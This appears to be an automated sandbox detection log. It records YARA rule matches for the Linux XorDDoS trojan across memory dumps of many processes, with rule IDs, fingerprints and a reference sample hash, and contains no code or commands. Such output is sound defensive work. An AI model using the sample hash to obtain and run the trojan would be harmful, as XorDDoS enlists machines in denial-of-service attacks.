Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6420.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6420.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6420.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6420.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6420.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6420.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6271.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6271.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6271.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6271.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6271.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6271.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
